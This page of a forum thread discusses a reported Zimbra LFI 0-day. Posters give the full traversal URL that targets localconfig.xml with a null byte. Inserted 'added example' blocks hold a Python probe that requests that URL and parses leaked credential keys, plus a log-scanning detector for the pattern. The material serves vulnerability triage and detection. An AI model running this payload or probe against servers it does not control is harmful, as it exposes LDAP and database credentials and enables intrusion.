Page 2 of 4
Results 11 to 20 of 38

Thread: zimbra 0-day

  1. #11 phoenix (Zimbra Consultant & Moderator)

    Please see the following

    Security Guidance for reported "0day Exploit"

    I'll say this again: if anyone thinks that the current version of Zimbra is still vulnerable to this problem, please file a bug report. That is the correct place for this and will get the attention of the Developers quicker than posting ad-hoc comments in the forums.
    Regards


    Bill



  2. #12 expert_az (Active Member)

    phoenix, I tried to use Zimbra Bugzilla; it's not working for me. I could not log in to Bugzilla with my old account (password reset), then created a new one, and still nothing.

    By the way, the 0day exploit was reported as Bug#: 85249
    $ zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.

  3. #13 phoenix (Zimbra Consultant & Moderator)

    Quote Originally Posted by expert_az:
    phoenix, I tried to use Zimbra Bugzilla; it's not working for me. I could not log in to Bugzilla with my old account (password reset), then created a new one, and still nothing.
    It works fine for me, make sure you don't have anything blocking it in your browser (or clear the cache).
    Regards


    Bill



  4. #14 anndro (Starter Member)

    I reported Bug#: 85249 but still UNCONFIRMED

  5. #15 nrc (Active Member)

    Quote Originally Posted by expert_az:
    I can confirm, LFI is working on the latest 8.0.5 and after 7.2.2.

    LFI is located at:
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    Zimbra - 0day exploit / Privilege escalation via LFI
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?

    It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.

    Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.
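The question nrc raises above (does the response actually contain localconfig.xml, or just a settings/message bundle?) can be answered mechanically. The following is an added example, not code from this thread or from Zimbra: it fetches the traversal URL from a host you own, gunzips the `.zgz` body, and reports LEAK only if strings that exist solely in `/opt/zimbra/conf/localconfig.xml` are present. The host name, the message-bundle heuristic and the sample bodies are assumptions/constructed test data.

```python
# Added example (not code from the thread or from Zimbra): classify the body a
# ZCS server returns for the traversal URL quoted above. A patched build answers
# with a gzip'd localized-messages JS bundle (or a 404); a vulnerable build
# includes the contents of /opt/zimbra/conf/localconfig.xml.
import gzip
import re
import sys
import urllib.error
import urllib.request

# Request path exactly as posted in the thread (trailing NUL byte via %00).
PROBE_PATH = (
    "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"
    "?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
)

# Strings that occur only in localconfig.xml; any one of them in the body means
# the file was read through the LFI.
LEAK_MARKERS = (b"<localconfig>", b"zimbra_ldap_password",
                b"ldap_root_password", b"mysql_root_password")

# Heuristic (assumption): the benign response is the JS message bundle, whose
# lines assign to the AjxMsg/ZmMsg/... objects named in the URL.
MSG_BUNDLE_RE = re.compile(rb"\b(?:I18nMsg|AjxMsg|ZMsg|ZmMsg|ZdMsg|AjxKeys|ZmKeys)\s*[.\[=]")

# localconfig.xml layout: <key name="..."><value>...</value></key>
KEY_RE = re.compile(rb'<key name="([^"]+)">\s*<value>([^<]*)</value>', re.S)

# Constructed sample bodies for offline testing (not real server output).
SAMPLE_LEAK_GZ = gzip.compress(
    b'<localconfig>\n  <key name="zimbra_ldap_password">\n'
    b'    <value>s3cret</value>\n  </key>\n</localconfig>\n')
SAMPLE_MESSAGES = b'AjxMsg.yes = "Yes";\nZmMsg.bye = "Bye";\n'


def decode_body(body: bytes) -> bytes:
    """.zgz resources are gzip-compressed; decompress when the magic is present."""
    if body[:2] == b"\x1f\x8b":
        return gzip.decompress(body)
    return body


def classify(body: bytes) -> str:
    """LEAK = localconfig.xml content present; MESSAGES = ordinary bundle; OTHER."""
    data = decode_body(body)
    if any(marker in data for marker in LEAK_MARKERS):
        return "LEAK"
    if MSG_BUNDLE_RE.search(data):
        return "MESSAGES"
    return "OTHER"


def leaked_keys(body: bytes) -> dict:
    """Pull <key name>/<value> pairs out of an included localconfig.xml."""
    data = decode_body(body)
    return {k.decode(): v.decode().strip() for k, v in KEY_RE.findall(data)}


def probe(host: str, timeout: float = 10.0) -> str:
    """Fetch PROBE_PATH from your own ZCS host and classify the response."""
    url = f"https://{host}{PROBE_PATH}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:  # system CA store
            body = resp.read()
    except urllib.error.HTTPError as err:
        return f"HTTP {err.code}"  # a 404 here is the expected, harmless answer
    verdict = classify(body)
    if verdict == "LEAK":
        # Print key names only; never paste the values into a forum thread.
        print("leaked keys:", ", ".join(sorted(leaked_keys(body))))
    return verdict


if __name__ == "__main__":
    # Usage: python zcs_lfi_probe.py mail.example.com   (hypothetical host)
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "mail.example.com"))
```

Run it only against servers you administer. A MESSAGES verdict matches what the posters above describe for 7.2.5, 8.0.3 and 8.0.5 (a long list of settings, none of them from localconfig.xml); LEAK is the condition the exploit needs, since the admin-console step in the published exploit is driven by the LDAP credentials in that file.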

  6. #16 liverpoolfcfan (Outstanding Member)

    Quote Originally Posted by nrc:
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
    I can confirm that on 7.2.5 the url returns lots of settings but NOT anything from the localconfig.xml file.

  7. #17 expert_az (Active Member)

    Quote Originally Posted by nrc:
    When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?

    It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.

    Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.
    nrc, you are right, the data coming back after hitting the URL used by the exploit is not localconfig.xml. But I'm getting a long list of settings even on 8.0.5; is this normal?
    $zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.

  8. #18 JakeMS (Active Member)

    Hey guys.

    From a quick bit of testing the admin one is fixed.

    However hitting your ZCS 8.0.5 server with:
    https://mail.yourdomain.com/opt/zimb...ocalconfig.xml

    Doesn't appear to pull localconfig.xml however is instead pulling a language file of some sort?

    I would suggest to anyone at the moment until we know further details to do the following:

    1) Change from default port 80 to an alternate port, or if your IP does not change, restrict it to your own IP only.
    2) Block off 7071 from unknown IPs (you should have been doing this anyway).

    At least this way, worst case, they get an Admin login, but cannot actually access the admin control panel to do anything (Unless they root your server, but that's a whole other matter)

    Good luck guys!

  9. #19 nrc (Active Member)

    Quote Originally Posted by JakeMS:
    Hey guys.

    From a quick bit of testing the admin one is fixed.

    However hitting your ZCS 8.0.5 server with:
    https://mail.yourdomain.com/opt/zimb...ocalconfig.xml

    Doesn't appear to pull localconfig.xml however is instead pulling a language file of some sort?
    When I hit the URL you posted on my 8.0.3 system I get a 404 error, which is what I would expect. I really don't understand why anything in that namespace would respond.

    The original URL used in the exploit appears to be hitting an API call that is intended to return configuration settings. I can't find the documentation for that specific call but as long as it's only returning the intended information and not arbitrary files through an LFI then it should be harmless.

  10. #20 JakeMS (Active Member)

    I've just checked my previous post.

    It would seem vBulletin scrapped most of the URL.

    Add:
    res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

    To the end instead. :-).

    If successful you will see:
    https://dl.dropboxusercontent.com/u/...pub/zm/odd.png

    But it appears to just be some language file, so it shouldn't cause any issues imo.

    Enjoy! :-D.
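Whether or not a given build leaks the file, the request pattern posted above is worth alerting on, because anyone sending it is running the published exploit against you. The following is an added example (not from this thread or from Zimbra) that scans web-tier access log lines for the `res/...js.zgz?skin=` traversal, decoding percent-encoding repeatedly so double-encoded variants and the `%00` null byte are caught; the log lines are constructed samples in combined log format, and the field layout of a real deployment may differ.

```python
# Added example (not code from the thread or from Zimbra): flag access-log
# requests that carry directory traversal, a NUL byte, or a localconfig.xml
# reference in the skin= parameter of the res/ message-bundle URL.
import re
from urllib.parse import parse_qs, unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: two probes from one client (plain and double-encoded),
# then two legitimate requests. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2013:11:02:13 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 11324 "-" "curl/7.29.0"
203.0.113.7 - - [10/Dec/2013:11:02:41 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=%252e%252e%252f%252e%252e%252fopt%252fzimbra%252fconf%252flocalconfig.xml%2500 HTTP/1.1" 200 11324 "-" "curl/7.29.0"
198.51.100.4 - - [10/Dec/2013:11:05:09 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 11324 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2013:11:05:10 +0000] "GET /zimbra/ HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
"""


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; stops as soon as a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def traversal_reasons(target: str) -> list:
    """Return the reasons a request target looks like the res/ skin traversal."""
    reasons = []
    decoded = fully_decode(target)
    if unquote(target) != decoded:
        reasons.append("double URL encoding")
    _, _, query = decoded.partition("?")
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name == "skin" and ("../" in value or "..\\" in value):
                reasons.append("directory traversal in skin")
            if "\x00" in value:
                reasons.append(f"null byte in {name}")
            if "localconfig.xml" in value or "/opt/zimbra/" in value:
                reasons.append(f"sensitive path in {name}")
    return reasons


def scan(lines) -> list:
    """One dict per suspicious request: ip, time, status and the reasons."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; adapt LOG_RE for your deployment
        reasons = traversal_reasons(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["ip"]} {hit["time"]} {hit["status"]} {"; ".join(hit["reasons"])}')
```

A 200 on such a request does not by itself prove a leak (the posters above get 200 with a harmless message bundle), so pair this with the response check and treat any hit as a reason to confirm the admin console on 7071 is not reachable from that source address.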
